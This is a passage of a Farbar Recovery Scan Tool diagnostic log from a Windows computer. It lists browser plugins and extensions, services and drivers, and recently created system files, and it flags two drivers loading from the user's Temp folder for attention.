FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-06-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-08-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-08-19] (Google Inc.)

Chrome:
=======
CHR Profile: C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default [2018-08-19]
CHR Extension: (Slides) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-08-19]
CHR Extension: (Docs) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-08-19]
CHR Extension: (Google Drive) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-08-19]
CHR Extension: (YouTube) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-08-19]
CHR Extension: (Google Docs Offline) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-08-19]
CHR Extension: (Gmail) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-08-19]

Opera:
=======
OPR Session Restore: -> is enabled.

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-09-15] (Advanced Micro Devices, Inc.) [File not signed]
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-04] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [333688 2018-06-13] (HP Inc.)
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2451456 2012-07-13] (Realsil Microelectronics Inc.) [File not signed]
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
S3 SandraAgentSrv; C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [136192 2018-05-21] (SiSoftware) [File not signed]
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-28] (Synaptics Incorporated)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1809.2-0\NisSrv.exe [3847376 2018-09-25] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1809.2-0\MsMpEng.exe [114200 2018-09-25] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 ALSysIO; C:\Users\Christopher&Gabriell\AppData\Local\Temp\ALSysIO64.sys [46384 2018-10-10] (Arthur Liberman) <==== ATTENTION
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [21160 2012-09-22] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 APXACC; C:\WINDOWS\system32\DRIVERS\appexDrv.sys [228032 2014-08-08] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [111112 2017-11-17] (Advanced Micro Devices)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-29] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [604160 2018-04-11] (Realtek )
S3 SANDRA; C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\WNt600x64\Sandra.sys [23112 2009-08-07] (SiSoftware)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46184 2018-09-25] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [352424 2018-09-25] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60584 2018-09-25] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [34944 2018-05-11] (HP)
S0 sxupg; System32\drivers\iahngrmp.sys [X]
S1 xcumk; \??\C:\Users\CHRIST~1\AppData\Local\Temp\lmhxicru.sys [X] <==== ATTENTION

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-10 18:41 - 2018-10-10 18:42 - 000012615 _____ C:\Users\Christopher&Gabriell\Desktop\FRST.txt
2018-10-10 18:41 - 2018-10-10 18:41 - 000000000 ____D C:\FRST
2018-10-10 18:40 - 2018-10-10 18:40 - 000001599 _____ C:\Users\Christopher&Gabriell\Desktop\AdwCleaner[C01].txt
2018-10-10 18:14 - 2018-10-10 18:14 - 002414592 _____ (Farbar) C:\Users\Christopher&Gabriell\Desktop\FRST64.exe
2018-10-10 18:13 - 2018-10-10 18:14 - 007567568 _____ (Malwarebytes) C:\Users\Christopher&Gabriell\Desktop\AdwCleaner.exe
2018-10-10 04:58 - 2018-10-10 04:58 - 000018636 _____ C:\Users\Christopher&Gabriell\Documents\total army.xlsx
2018-10-10 04:05 - 2018-10-10 04:05 - 000001158 _____ C:\Users\Christopher&Gabriell\Desktop\Notepad.lnk
2018-10-10 00:59 - 2018-09-20 23:11 - 000753056 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2018-10-10 00:59 - 2018-09-20 23:08 - 004404720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2018-10-10 00:59 - 2018-09-20 23:08 - 000709936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2018-10-10 00:59 - 2018-09-20 23:08 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2018-10-10 00:59 - 2018-09-20 23:07 - 000604664 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2018-10-10 00:59 - 2018-09-20 22:43 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2018-10-10 00:59 - 2018-09-20 22:42 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-10-10 00:59 - 2018-09-20 22:41 - 003396096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-10-10 00:59 - 2018-09-20 22:40 - 002368000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2018-10-10 00:59 - 2018-09-20 22:39 - 003320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2018-10-10 00:59 - 2018-09-20 22:39 - 001535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2018-10-10 00:59 - 2018-09-20 22:38 - 002172928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-10-10 00:59 - 2018-09-20 22:38 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-10-10 00:59 - 2018-09-20 22:37 - 001211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 001034240 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2018-10-10 00:59 - 2018-09-20 04:22 - 013572096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2018-10-10 00:59 - 2018-09-19 23:29 - 006569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2018-10-10 00:59 - 2018-09-19 23:10 - 001221128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2018-10-10 00:59 - 2018-09-19 23:10 - 001029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2018-10-10 00:59 - 2018-09-19 23:10 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 009089848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2018-10-10 00:59 - 2018-09-19 23:09 - 007520096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 007432136 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 002825232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 002462888 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 002421248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 000885952 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 000793088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2018-10-10 00:59 - 2018-09-19 22:53 - 025851392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2018-10-10 00:59 - 2018-09-19 22:46 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2018-10-10 00:59 - 2018-09-19 22:44 - 008188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2018-10-10 00:59 - 2018-09-19 22:44 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2018-10-10 00:59 - 2018-09-19 22:41 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2018-10-10 00:59 - 2018-09-19 22:40 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2018-10-10 00:59 - 2018-09-08 03:07 - 002868536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2018-10-10 00:59 - 2018-09-08 02:38 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2018-10-10 00:59 - 2018-09-07 22:58 - 000376120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2018-10-10 00:59 - 2018-09-07 22:57 - 000267576 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2018-10-10 00:59 - 2018-09-07 22:31 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2018-10-10 00:59 - 2018-09-07 22:29 - 004771840 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2018-10-10 00:59 - 2018-09-07 22:29 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\exfat.sys
2018-10-10 00:59 - 2018-09-07 22:27 - 003348992 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2018-10-10 00:59 - 2018-09-07 22:27 - 000596992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2018-10-10 00:59 - 2018-09-07 22:26 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2018-10-10 00:59 - 2018-09-07 22:24 - 001457664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2018-10-10 00:59 - 2018-08-02 22:38 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\vertdll.dll
2018-10-10 00:58 - 2018-09-21 04:18 - 021386888 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2018-10-10 00:58 - 2018-09-21 04:01 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\itss.dll
2018-10-10 00:58 - 2018-09-21 03:22 - 020381784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2018-10-10 00:58 - 2018-09-21 03:12 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\itss.dll
2018-10-10 00:58 - 2018-09-20 23:14 - 000661056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2018-10-10 00:58 - 2018-09-20 23:13 - 000480568 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2018-10-10 00:58 - 2018-09-20 23:12 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-10-10 00:58 - 2018-09-20 23:09 - 004790160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 001427968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 001062920 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2018-10-10 00:58 - 2018-09-20 23:09 - 000129088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 001566720 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 001456720 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-10-10 00:58 - 2018-09-20 23:08 - 001257864 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-10-10 00:58 - 2018-09-20 23:08 - 001140672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-10-10 00:58 - 2018-09-20 23:08 - 000982600 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-10-10 00:58 - 2018-09-20 23:08 - 000261008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2018-10-10 00:58 - 2018-09-20 22:58 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2018-10-10 00:58 - 2018-09-20 22:57 - 002900992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2018-10-10 00:58 - 2018-09-20 22:57 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2018-10-10 00:58 - 2018-09-20 22:56 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2018-10-10 00:58 - 2018-09-20 22:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2018-10-10 00:58 - 2018-09-20 22:53 - 001006080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2018-10-10 00:58 - 2018-09-20 22:39 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2018-10-10 00:58 - 2018-09-20 22:39 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2018-10-10 00:58 - 2018-09-20 22:37 - 002904064 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2018-10-10 00:58 - 2018-09-20 22:37 - 002236928 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2018-10-10 00:58 - 2018-09-20 22:37 - 000604160 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2018-10-10 00:58 - 2018-09-20 22:36 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2018-10-10 00:58 - 2018-09-20 22:36 - 000401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2018-10-10 00:58 - 2018-09-20 04:40 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2018-10-10 00:58 - 2018-09-20 04:37 - 001634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2018-10-10 00:58 - 2018-09-20 04:23 - 006602240 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2018-10-10 00:58 - 2018-09-20 04:19 - 001121792 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2018-10-10 00:58 - 2018-09-20 04:18 - 003649024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2018-10-10 00:58 - 2018-09-20 04:18 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 002874368 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2018-10-10 00:58 - 2018-09-20 04:16 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpshell.dll
2018-10-10 00:58 - 2018-09-20 03:46 - 001454440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2018-10-10 00:58 - 2018-09-20 03:35 - 005669888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2018-10-10 00:58 - 2018-09-20 03:34 - 012500992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2018-10-10 00:58 - 2018-09-20 03:30 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2018-10-10 00:58 - 2018-09-20 03:29 - 002891776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2018-10-10 00:58 - 2018-09-20 03:29 - 002824704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2018-10-10 00:58 - 2018-09-20 03:29 - 001586176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2018-10-10 00:58 - 2018-09-20 03:28 - 000102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpshell.dll
2018-10-10 00:58 - 2018-09-20 01:43 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2018-10-10 00:58 - 2018-09-20 00:52 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 006039368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 001989232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 001513032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 000357056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 001129544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 000581792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 000567256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2018-10-10 00:58 - 2018-09-19 23:21 - 022013440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2018-10-10 00:58 - 2018-09-19 23:17 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2018-10-10 00:58 - 2018-09-19 23:15 - 019404288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2018-10-10 00:58 - 2018-09-19 23:13 - 003711488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2018-10-10 00:58 - 2018-09-19 23:12 - 000272200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave.dll
2018-10-10 00:58 - 2018-09-19 23:12 - 000269128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave_secure.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 005777920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2018-10-10 00:58 - 2018-09-19 23:10 - 002719032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2018-10-10 00:58 - 2018-09-19 23:10 - 000566800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2018-10-10 00:58 - 2018-09-19 23:10 - 000500536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2018-10-10 00:58 - 2018-09-19 23:10 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2018-10-10 00:58 - 2018-09-19 23:10 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001767096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001097744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 000713472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2018-10-10 00:58 - 2018-09-19 23:08 - 004191232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2018-10-10 00:58 - 2018-09-19 23:08 - 001627648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2018-10-10 00:58 - 2018-09-19 22:43 - 000052736 _____ C:\WINDOWS\system32\runexehelper.exe
2018-10-10 00:58 - 2018-09-19 22:42 - 004866560 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2018-10-10 00:58 - 2018-09-19 22:42 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2018-10-10 00:58 - 2018-09-19 22:42 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 007577088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 000898560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 000319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2018-10-10 00:58 - 2018-09-19 22:41 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2018-10-10 00:58 - 2018-09-19 22:40 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2018-10-10 00:58 - 2018-09-19 22:40 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2018-10-10 00:58 - 2018-09-19 22:38 - 001724416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2018-10-10 00:58 - 2018-09-19 22:38 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2018-10-10 00:58 - 2018-09-19 22:37 - 004615680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2018-10-10 00:58 - 2018-09-19 22:37 - 001804288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2018-10-10 00:58 - 2018-09-19 22:36 - 001375232 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2018-10-10 00:58 - 2018-09-19 21:21 - 000001312 _____ C:\WINDOWS\system32\tcbres.wim
2018-10-10 00:58 - 2018-09-19 20:28 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2018-10-10 00:58 - 2018-09-08 03:12 - 000452112 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 001610552 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000792376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000689464 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000612360 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000309560 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000144696 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2018-10-10 00:58 - 2018-09-08 03:07 - 000069944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2018-10-10 00:58 - 2018-09-08 03:02 - 000645112 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2018-10-10 00:58 - 2018-09-08 03:02 - 000540984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2018-10-10 00:58 - 2018-09-08 02:58 - 001639352 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2018-10-10 00:58 - 2018-09-08 02:58 - 001520744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2018-10-10 00:58 - 2018-09-08 02:57 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2018-10-10 00:58 - 2018-09-08 02:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdBth.dll
2018-10-10 00:58 - 2018-09-08 02:43 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
2018-10-10 00:58 - 2018-09-08 02:43 - 000047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardBi.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.XamlHost.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthci.dll
